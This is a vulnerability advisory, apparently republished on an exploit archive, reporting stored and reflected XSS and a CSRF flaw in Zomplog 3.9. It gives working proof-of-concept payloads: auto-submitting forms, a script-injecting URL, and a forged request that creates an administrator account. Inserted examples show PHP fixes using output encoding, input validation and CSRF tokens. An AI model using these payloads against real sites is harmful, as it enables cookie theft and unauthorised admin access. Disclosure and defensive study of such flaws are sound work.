ID: 1337DAY-ID-14615
Type: zdt
Reporter: High-Tech Bridge
Modified: 2010-10-28T00:00:00
Description: Exploit for php platform in category web applications
===============================================
Zomplog 3.9 Multiple XSS & XSRF Vulnerabilities
===============================================
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zomplog_1.html
Product: Zomplog
Vendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )
Vulnerable Version: 3.9 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to the failure of the "/admin/settings_menu.php" script to properly sanitize user-supplied input in the "about" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/settings_menu.php" method="post" enctype="multipart/form-data" name="main">
<input type="hidden" name="Submit" value="Submit ››">
<input type="hidden" name="search" value="1">
<input type="hidden" name="teasers" value="1">
<input type="hidden" name="archive" value="1">
<input type="hidden" name="latestentries" value="1">
<input type="hidden" name="nr_entries" value="10">
<input type="hidden" name="latestcomments" value="1">
<input type="hidden" name="nr_comments" value="10">
<input type="hidden" name="categories" value="1">
<input type="hidden" name="authors" value="1">
<input type="hidden" name="pages" value="1">
<input type="hidden" name="meta" value="1">
<input type="hidden" name="login" value="1">
<input type="hidden" name="use_join" value="1">
<input type="hidden" name="powered" value="1">
<input type="hidden" name="about" value='about"><script>alert(document.cookie)</script>'>
<input type="hidden" name="customfield" value="customfield">
</form>
<script>
document.main.submit();
</script>
-----------------------------------------------------------------------------------------------------------------
Vulnerability ID: HTB22644
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zomplog_2.html
Product: Zomplog
Vendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )
Vulnerable Version: 3.9 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to the failure of the "/admin/editor_pages.php" script to properly sanitize user-supplied input in the "id" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
http://host/admin/editor_pages.php?id=1'"><script>alert(document.cookie)</script>
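Added example, not part of the advisory and not Zomplog source code: a sketch of the output handling that closes both XSS issues above (the stored "about" value and the reflected "id" parameter). The helper names h() and page_id() and the surrounding markup are hypothetical; the sample inputs are constructed to match the shape of the two PoC values.

```php
<?php
// Added example: hypothetical helpers, not taken from Zomplog.

/** Encode a value for an HTML text node or a quoted attribute value. */
function h(string $value): string
{
    // ENT_QUOTES encodes both " and ', so neither quote style can
    // terminate the attribute the value is written into.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Accept only a positive decimal integer as a record id; null otherwise. */
function page_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Constructed inputs shaped like the advisory's PoC values.
$about = 'about"><script>alert(document.cookie)</script>';
$rawId = '1\'"><script>alert(document.cookie)</script>';

// Stored value ("about"): keep it as submitted, encode every time it is written out.
echo '<input type="text" name="about" value="' . h($about) . '">' . "\n";

// Reflected value ("id"): validate the type first, and refuse anything else
// instead of echoing it back into the page.
$id = page_id($rawId);
if ($id === null) {
    http_response_code(400);
    echo "Invalid page id\n";
} else {
    echo '<input type="hidden" name="id" value="' . $id . '">' . "\n";
}
```

Encoding is applied at output rather than on input, so values already stored before the change are rendered safely as well.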
-----------------------------------------------------------------------------------------------------------------
Vulnerability ID: HTB22645
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_zomplog.html
Product: Zomplog
Vendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )
Vulnerable Version: 3.9 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to the failure of the "/admin/users.php" script to properly verify the source of the HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/users.php" method="post">
<input type="hidden" name="login" value="newuserlogin">
<input type="hidden" name="password" value="password">
<input type="hidden" name="password2" value="password">
<input type="hidden" name="admin" value="1">
<input type="submit" id="btn" name="submit" value="Submit ››">
</form>
<script>
document.getElementById('btn').click();
</script>
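Added example, not part of the advisory and not Zomplog source code: one way for a script such as "/admin/users.php" to verify the source of a state-changing request with a per-session token. The function names, the "csrf_token" field name and the cookie settings are assumptions; the array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added example: hypothetical CSRF guard for an admin POST handler.

// HttpOnly keeps the session cookie out of reach of page scripts;
// SameSite=Lax stops the browser attaching it to cross-site POSTs.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

/** Return the session's token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** True only when the posted token matches the one held in the session. */
function csrf_check(array $post, array $session): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // hash_equals() compares in constant time; known value goes first.
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_check($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    // Only past this point may the handler create or modify a user.
}
?>
<form action="users.php" method="post">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="login">
  <input type="password" name="password">
  <input type="password" name="password2">
  <input type="submit" name="submit" value="Submit">
</form>
```

A forged form hosted on another site cannot read the session's token, so its POST fails the check and is answered with 403.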
# 0day.today [2018-01-03] #